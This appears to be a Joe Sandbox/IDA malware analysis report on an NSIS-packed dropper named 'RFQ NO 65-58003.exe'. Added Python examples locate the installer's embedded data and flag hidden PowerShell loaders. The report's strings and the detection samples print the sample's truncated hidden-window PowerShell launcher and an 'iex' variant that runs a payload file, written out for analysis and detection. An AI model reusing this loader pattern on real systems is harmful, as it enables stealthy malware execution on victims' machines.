                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                              • String ID: (7B
                                                              • API String ID: 3282139019-3251261122
                                                              • Opcode ID: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                              • Instruction ID: fc2721e09aaab4c72f4ebfdf2c157598dee1e076b88a1be66e463b94688f5fa6
                                                              • Opcode Fuzzy Hash: bf57cdb372042753c8b1df4c54f37feee0138c44ccfb620b50d6a1129c986343
                                                              • Instruction Fuzzy Hash: 6BC1C2B1600201FFCB21AF61ED85E2B3AB9EB95345F40057EFA41B11F0CB7998529B2D

                                                              Control-flow Graph
                                                              control_flow_graph 285 403a5b-403a73 call 4065ec 288 403a75-403a85 call 406159 285->288 289 403a87-403abe call 4060df 285->289 298 403ae1-403b0a call 403d31 call 405cce 288->298 293 403ac0-403ad1 call 4060df 289->293 294 403ad6-403adc lstrcatW 289->294 293->294 294->298 303 403b10-403b15 298->303 304 403b9c-403ba4 call 405cce 298->304 303->304 305 403b1b-403b35 call 4060df 303->305 309 403bb2-403bd7 LoadImageW 304->309 310 403ba6-403bad call 406234 304->310 311 403b3a-403b43 305->311 314 403c58-403c60 call 40140b 309->314 315 403bd9-403c09 RegisterClassW 309->315 310->309 311->304 312 403b45-403b49 311->312 316 403b5b-403b67 lstrlenW 312->316 317 403b4b-403b58 call 405bf3 312->317 328 403c62-403c65 314->328 329 403c6a-403c75 call 403d31 314->329 318 403d27 315->318 319 403c0f-403c53 SystemParametersInfoW CreateWindowExW 315->319 323 403b69-403b77 lstrcmpiW 316->323 324 403b8f-403b97 call 405bc6 call 406212 316->324 317->316 322 403d29-403d30 318->322 319->314 323->324 327 403b79-403b83 GetFileAttributesW 323->327 324->304 331 403b85-403b87 327->331 332 403b89-403b8a call 405c12 327->332 328->322 338 403c7b-403c95 ShowWindow call 40657c 329->338 339 403cfe-403cff call 405444 329->339 331->324 331->332 332->324 344 403ca1-403cb3 GetClassInfoW 338->344 345 403c97-403c9c call 40657c 338->345 342 403d04-403d06 339->342 346 403d20-403d22 call 40140b 342->346 347 403d08-403d0e 342->347 350 403cb5-403cc5 GetClassInfoW RegisterClassW 344->350 351 403ccb-403cee DialogBoxParamW call 40140b 344->351 345->344 346->318 347->328 352 403d14-403d1b call 40140b 347->352 350->351 355 403cf3-403cfc call 4039ab 351->355 352->328 355->322
                                                              APIs
                                                                • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                                • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                              • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,76233420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\RFQ NO 65-58003.exe",00000000), ref: 00403ADC
                                                              • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Roaming\afdragsordning,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,76233420), ref: 00403B5C
                                                              • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,C:\Users\user\AppData\Roaming\afdragsordning,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403B6F
                                                              • GetFileAttributesW.KERNEL32(004281E0), ref: 00403B7A
                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\afdragsordning), ref: 00403BC3
                                                                • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                              • RegisterClassW.USER32(004291E0), ref: 00403C00
                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C18
                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403C4D
                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403C83
                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403CAF
                                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403CBC
                                                              • RegisterClassW.USER32(004291E0), ref: 00403CC5
                                                              • DialogBoxParamW.USER32(?,00000000,00403DFE,00000000), ref: 00403CE4
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: Completed$"C:\Users\user\Desktop\RFQ NO 65-58003.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\afdragsordning$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                              • API String ID: 1975747703-2840682946
                                                              • Opcode ID: 6b377800bd07bcba5734f56e34084f7132bdecffcf0977c8fa7c0fe37e1477d4
                                                              • Instruction ID: a49deb01357f173a4aad96dc60f9d02752f373419f451c4cfac2514e29acbaba
                                                              • Opcode Fuzzy Hash: 6b377800bd07bcba5734f56e34084f7132bdecffcf0977c8fa7c0fe37e1477d4
                                                              • Instruction Fuzzy Hash: ED61C370240300BAD620AF669D45E2B3A7CEB84749F40457EF941B22E2DB7D9D52CA2D

                                                               Control-flow Graph (rendered graph, legend Executed / Not Executed; image not reproduced, node data summarised): function 402ed5. Blocks with API or subroutine calls: 402ed5-402f23 GetTickCount, GetModuleFileNameW, call 405de7; 402f2f-402f5d call 406212, call 405c12, call 406212, GetFileSize; 402f7e-402f8b call 4033ec; 402f99-402fb1 call 405da2; 40301d-403023 call 402e33; 40302c-40303a call 40669d; 40304d-40305b call 402e33; 403066-40307e call 403402, call 4033ec; 403090-4030dc GlobalAlloc, call 40670b, call 405e16, CreateFileW; 4030e8-4030f0 call 402e33; 4030f2-403122 call 403402, call 40317b; 40315a-403172 call 405da2.
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 00402EE9
                                                              • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\RFQ NO 65-58003.exe,00000400), ref: 00402F05
                                                                • Part of subcall function 00405DE7: GetFileAttributesW.KERNELBASE(00000003,00402F18,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00405DEB
                                                                • Part of subcall function 00405DE7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0D
                                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ NO 65-58003.exe,C:\Users\user\Desktop\RFQ NO 65-58003.exe,80000000,00000003), ref: 00402F4E
                                                              • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 00403095
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                              • String ID: "C:\Users\user\Desktop\RFQ NO 65-58003.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\RFQ NO 65-58003.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                              • API String ID: 2803837635-1611239955
                                                              • Opcode ID: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                              • Instruction ID: 3828440c67d76786f1e0e44594fc16ccb97003feb117245618602a5e37269db8
                                                              • Opcode Fuzzy Hash: cc8dbefb85167051c5f544e5004306f35bb35ae70e2c75d84afc589ab8111160
                                                              • Instruction Fuzzy Hash: 5E61C271A01204ABDB20DF65DD85B9E7BB8EB04355F20417BFA00F62D1CB7C9A458B9D
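The function at 00402ED5 is the NSIS installer stub locating its own payload: it opens its own image (GetModuleFileNameW, GetFileSize, GlobalAlloc, CreateFileW above), and its strings are the dword constants "Null", "soft", "Inst" and the NSIS messages "Installer integrity check has failed" and "Error writing temporary file". The following Python script is an added example, not code from this report or from NSIS, that reproduces that search so an analyst can find where the NSIS data starts in a sample before handing it to an unpacker. The 28-byte firstheader layout (flags, 0xDEADBEEF, "NullsoftInst", header length, data length), the flag bits and the 512-byte stepping are assumed to match the NSIS exehead source; the sample image built in the block is constructed for the test and is not this sample.

```python
"""Locate the NSIS firstheader in a self-extracting installer stub.

Added example (not from the Joe Sandbox report or the NSIS project).
Assumed layout, seven little-endian dwords as in NSIS fileform.h:
    flags | 0xDEADBEEF | 'Null' | 'soft' | 'Inst' | header_len | data_len
The stub checks candidate offsets on 512-byte boundaries; so do we.
"""
import struct
import sys
from dataclasses import dataclass
from typing import List, Optional

FH_SIG = 0xDEADBEEF
FH_MAGIC = b"NullsoftInst"          # the 'Null', 'soft', 'Inst' dwords seen in the stub's strings
FH_SIZE = 28
FH_FLAGS_MASK = 0xF                 # any flag bit above these four invalidates a candidate
FH_FLAG_NAMES = {0x1: "UNINSTALL", 0x2: "SILENT", 0x4: "NO_CRC", 0x8: "FORCE_CRC"}
STEP = 512


@dataclass
class FirstHeader:
    offset: int        # file offset of the 28-byte firstheader
    flags: int
    header_len: int    # size of the (possibly compressed) NSIS header that follows
    data_len: int      # "length of all following data" as declared by the header

    def flag_names(self) -> List[str]:
        return [name for bit, name in FH_FLAG_NAMES.items() if self.flags & bit]

    @property
    def data_end(self) -> int:
        # Anything past this point is overlay that NSIS itself will not read.
        return self.offset + self.data_len


def find_firstheader(image: bytes) -> Optional[FirstHeader]:
    """Scan 512-byte aligned offsets for a plausible NSIS firstheader."""
    for off in range(0, len(image) - FH_SIZE + 1, STEP):
        flags, sig = struct.unpack_from("<II", image, off)
        if sig != FH_SIG or image[off + 8:off + 20] != FH_MAGIC:
            continue
        header_len, data_len = struct.unpack_from("<II", image, off + 20)
        if flags & ~FH_FLAGS_MASK:          # unknown flag bits: not a real header
            continue
        if data_len > len(image) - off:     # header claims more data than the file holds
            continue
        return FirstHeader(off, flags, header_len, data_len)
    return None


def build_sample_image() -> bytes:
    """Constructed test input, not the analysed sample: a fake 1 KiB stub so the
    firstheader lands on a 512-byte boundary, SILENT flag set, 1000 payload bytes."""
    stub = b"MZ" + b"\x00" * 1022
    payload = b"\xAA" * 1000
    data_len = FH_SIZE + len(payload)
    fh = struct.pack("<II", 0x2, FH_SIG) + FH_MAGIC + struct.pack("<II", 0x180, data_len)
    return stub + fh + payload


if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    fh = find_firstheader(data)
    if fh is None:
        print("no NSIS firstheader found")
    else:
        print(f"firstheader at 0x{fh.offset:x}: flags={fh.flag_names()} "
              f"header_len=0x{fh.header_len:x} data_len=0x{fh.data_len:x} "
              f"(NSIS data ends at 0x{fh.data_end:x}, file size 0x{len(data):x})")
```

Run it as `python nsis_firstheader.py "RFQ NO 65-58003.exe"` to get the offset of the embedded NSIS data; the "Installer integrity check has failed" string in this function belongs to the CRC that the stub computes over that region unless NO_CRC is set, which the script reports but does not recompute. A hit here plus the `nsm1096.tmp` plugin directory and `NSIS Error` strings elsewhere in the report is enough to hand the file to an NSIS-aware unpacker rather than treating it as a custom packer.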

                                                               Control-flow Graph (rendered graph, legend Executed / Not Executed; image not reproduced, node data summarised): function 406234. Blocks with API or subroutine calls: 4062f4-4062ff GetVersion; 406330-406356 call 4060df; 40635c-406365 call 406234 (recursive); 40636f-40637b GetSystemDirectoryW; 406382-406390 GetWindowsDirectoryW; 4063b6-4063cc SHGetSpecialFolderLocation; 4063ce-4063e5 SHGetPathFromIDListW, CoTaskMemFree; 4063fb-406401 lstrcatW; 406406-40640c call 4064a6; 40641a-406426 call 406159; 406428-406435 call 406212; 40644d-406455 call 406234 (recursive); 40645a-40646b lstrlenW; 406499-40649d call 406212.
                                                              APIs
                                                              • GetVersion.KERNEL32(00000000,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,?,004053A8,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 004062F7
                                                              • GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 00406375
                                                              • GetWindowsDirectoryW.KERNEL32(004281E0,00000400), ref: 00406388
                                                              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 004063C4
                                                              • SHGetPathFromIDListW.SHELL32(?,004281E0), ref: 004063D2
                                                              • CoTaskMemFree.OLE32(?), ref: 004063DD
                                                              • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 00406401
                                                              • lstrlenW.KERNEL32(004281E0,00000000,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,?,004053A8,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 0040645B
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406343
                                                              • powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas, xrefs: 0040642E
                                                              • C:\Users\user\AppData\Local\Temp\nsm1096.tmp\, xrefs: 00406259
                                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004063FB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                              • String ID: C:\Users\user\AppData\Local\Temp\nsm1096.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas
                                                              • API String ID: 900638850-3053705125
                                                              • Opcode ID: a900ca9bf6153fc6656b4f670c8f5ecdb0e059a5c91e72301d0c84f9da171f8e
                                                              • Instruction ID: 8986ea92d4020f82ea273b0cadebf120af401304848ce5cddb84501886c13395
                                                              • Opcode Fuzzy Hash: a900ca9bf6153fc6656b4f670c8f5ecdb0e059a5c91e72301d0c84f9da171f8e
                                                              • Instruction Fuzzy Hash: C661E371A00115EBDB209F24CD40AAE37A5AF50314F52817FE947BA2D0D73D8AA6CB9D
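The string expanded at 0040642E is the second stage's launcher: a PowerShell command with a hidden window that reads a file from C:\Users\user\AppData\Roaming\afdragsordning\ with `gc -raw` (the report truncates the command after `$Gas`). The function itself is the NSIS variable-expansion routine (system directory, Windows directory, special folders, Quick Launch), so the launcher is an ordinary installer string, not unpacked code. As an added example, not part of this report, the following Python triage function flags process-creation records with that shape: PowerShell started with a hidden window, a `-Raw` read of a payload file, the payload in a user-writable directory under an extension that is not a script type, and a parent executable that itself runs from a user-writable location. The records are constructed inline using Sysmon Event ID 1 field names (Image, CommandLine, ParentImage); those field names, the two benign records and the second malicious variant are assumptions, while record 0 uses the command-line prefix the report recovered.

```python
"""Triage PowerShell process-creation records for the NSIS-dropped loader shape:
hidden window + Get-Content -Raw of a payload file in a user-writable directory.

Added example, not from the Joe Sandbox report. Records are constructed below
with Sysmon Event ID 1 field names; other log sources only need a field mapping.
"""
import re
from typing import Dict, List

# -WindowStyle may be shortened to any unambiguous prefix (-w, -win, -window, ...).
HIDDEN_RE = re.compile(r"(?<![\w-])-w[a-z]*\s+hidden\b", re.I)
# gc, cat and type are aliases of Get-Content; capture the single-quoted path after -Raw.
GC_RAW_RE = re.compile(r"\b(?:gc|cat|type|get-content)\b[^;'\"]*?-raw[^;'\"]*?'([^']+)'", re.I)
USER_WRITABLE_RE = re.compile(
    r"\\Users\\[^\\]+\\(?:AppData\\(?:Roaming|Local)|Desktop|Downloads)\\"
    r"|\\Temp\\|\\Users\\Public\\", re.I)
SCRIPT_EXTS = {".ps1", ".psm1", ".psd1", ".txt", ".xml", ".json", ".csv"}


def triage(rec: Dict[str, str]) -> List[str]:
    """Return the indicators present in one process-creation record (empty if none)."""
    reasons: List[str] = []
    image = rec.get("Image", "").lower()
    if not image.endswith(("\\powershell.exe", "\\pwsh.exe")):
        return reasons
    cmd = rec.get("CommandLine", "")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window requested")
    m = GC_RAW_RE.search(cmd)
    if m:
        path = m.group(1)
        reasons.append("reads a file with Get-Content -Raw")
        if USER_WRITABLE_RE.search(path):
            reasons.append("payload file is in a user-writable directory")
        name = path.rsplit("\\", 1)[-1]
        ext = name[name.rfind("."):].lower() if "." in name else ""
        if ext not in SCRIPT_EXTS:
            reasons.append(f"unusual payload extension {ext or '(none)'}")
    if USER_WRITABLE_RE.search(rec.get("ParentImage", "")):
        reasons.append("parent executable runs from a user-writable directory")
    return reasons


def is_suspicious(rec: Dict[str, str]) -> bool:
    """Hidden window plus a -Raw file read is enough on its own (an admin script
    would be run with -File); otherwise require three independent indicators."""
    r = triage(rec)
    return ("hidden window requested" in r and "reads a file with Get-Content -Raw" in r) or len(r) >= 3


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed records. [0] is the command-line prefix the report recovered from the
# stub (cut off at $Gas there); [1] is a made-up variant with abbreviated switches;
# [2] and [3] are made-up benign scheduled-task runs.
SAMPLE_RECORDS = [
    {"Image": PS,
     "CommandLine": r"""powershell.exe -windowstyle hidden "$Sonnetish=gc -raw 'C:\Users\user\AppData\Roaming\afdragsordning\Rygklapperne.Tis225';$Gas""",
     "ParentImage": r"C:\Users\user\Desktop\RFQ NO 65-58003.exe"},
    {"Image": PS,
     "CommandLine": r'''powershell.exe -w hidden "$x=Get-Content -Raw 'C:\Users\bob\AppData\Local\Temp\upd.tmp';iex $x"''',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"Image": PS,
     "CommandLine": r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\ProgramData\Corp\inventory.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
    {"Image": PS,
     "CommandLine": r"powershell.exe -WindowStyle Hidden -File C:\ProgramData\Corp\inventory.ps1",
     "ParentImage": r"C:\Windows\System32\svchost.exe"},
]

if __name__ == "__main__":
    for i, rec in enumerate(SAMPLE_RECORDS):
        print(i, "SUSPICIOUS" if is_suspicious(rec) else "ok", triage(rec))
```

The hidden-window flag alone is deliberately not enough: record 3 shows a common administrative pattern that would otherwise page an analyst every night. The combination that matters is the one the stub builds, a hidden window and a `-Raw` read of a blob whose extension means nothing to PowerShell, which is why the rule treats that pair as sufficient and only falls back to counting indicators for other shapes.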

                                                               Control-flow Graph (rendered graph, legend Executed / Not Executed; image not reproduced, node data summarised): function 40176f. Blocks with API or subroutine calls: 40176f-401794 call 402c53, call 405c3d; 401796-40179c call 406212; 40179e-4017b0 call 406212, call 405bc6, lstrcatW; 4017b5-4017b6 call 4064a6; 4017c1-4017cb call 406555; 4017cd-4017db CompareFileTime; 4017f7-4017f8 call 405dc2; 4017fd-401819 call 405de7; 401820-40185e call 406212 (twice), call 406234, call 406212, call 405957; 40186f-401879 call 405371; 40188d-4018b6 call 405371, call 40317b; 4018be-4018ca SetFileTime; 4018d0-4018db CloseHandle; 4018e6-4018f7 call 406234, lstrcatW; 4018f9-4018fc call 406234; 401901-4022fc call 405957.
                                                              APIs
                                                              • lstrcatW.KERNEL32(00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\afdragsordning\Overrack2,?,?,00000031), ref: 004017B0
                                                              • CompareFileTime.KERNEL32(-00000014,?,%TMP%,%TMP%,00000000,00000000,%TMP%,C:\Users\user\AppData\Roaming\afdragsordning\Overrack2,?,?,00000031), ref: 004017D5
                                                                • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                                • Part of subcall function 00405371: lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                                • Part of subcall function 00405371: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 004053CC
                                                                • Part of subcall function 00405371: SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\), ref: 004053DE
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                                • Part of subcall function 00405371: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000433000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000044D000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2179441194.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_RFQ NO 65-58003.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                              • String ID: %TMP%$C:\Users\user\AppData\Roaming\afdragsordning\Overrack2$loyolism
                                                              • API String ID: 1941528284-1691582717
                                                              • Opcode ID: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
                                                              • Instruction ID: 0d28a5e8dae66ca407d9ab1903032e249cf50254bac70f3abe216f7737186e0f
                                                              • Opcode Fuzzy Hash: 00536d43247b0e684560901737a3663a089175b994d03775e1e0762796f7db5e
                                                              • Instruction Fuzzy Hash: 0541B131900119BACF217BA5CD45DAF3A79EF01368B20427FF422B10E1DB3C8A519A6E

                                                               Control-flow Graph (rendered graph, legend Executed / Not Executed; image not reproduced, node data summarised): function 405371. Blocks with API or subroutine calls: 40539f-4053a3 call 406234; 4053a8-4053b4 lstrlenW; 4053b6-4053c6 lstrlenW; 4053c8-4053cc lstrcatW; 4053d7-4053de SetWindowTextW; 4053ea-40542c SendMessageW (three times).
                                                              APIs
                                                              • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000,?), ref: 004053A9
                                                              • lstrlenW.KERNEL32(00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EAD,00000000), ref: 004053B9
                                                              • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00402EAD,00402EAD,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,00000000,00000000,00000000), ref: 004053CC
                                                              • SetWindowTextW.USER32(C:\Users\user\AppData\Local\Temp\nsm1096.tmp\,C:\Users\user\AppData\Local\Temp\nsm1096.tmp\), ref: 004053DE
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405404
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040541E
                                                              • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040542C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2178922619.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                               • Associated: 00000000.00000002.2178883210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178945773.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000418000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                               • Associated: 00000000.00000002.2178965090.000000000042B000.00000004.00000001.01000000.00000003.sdmp
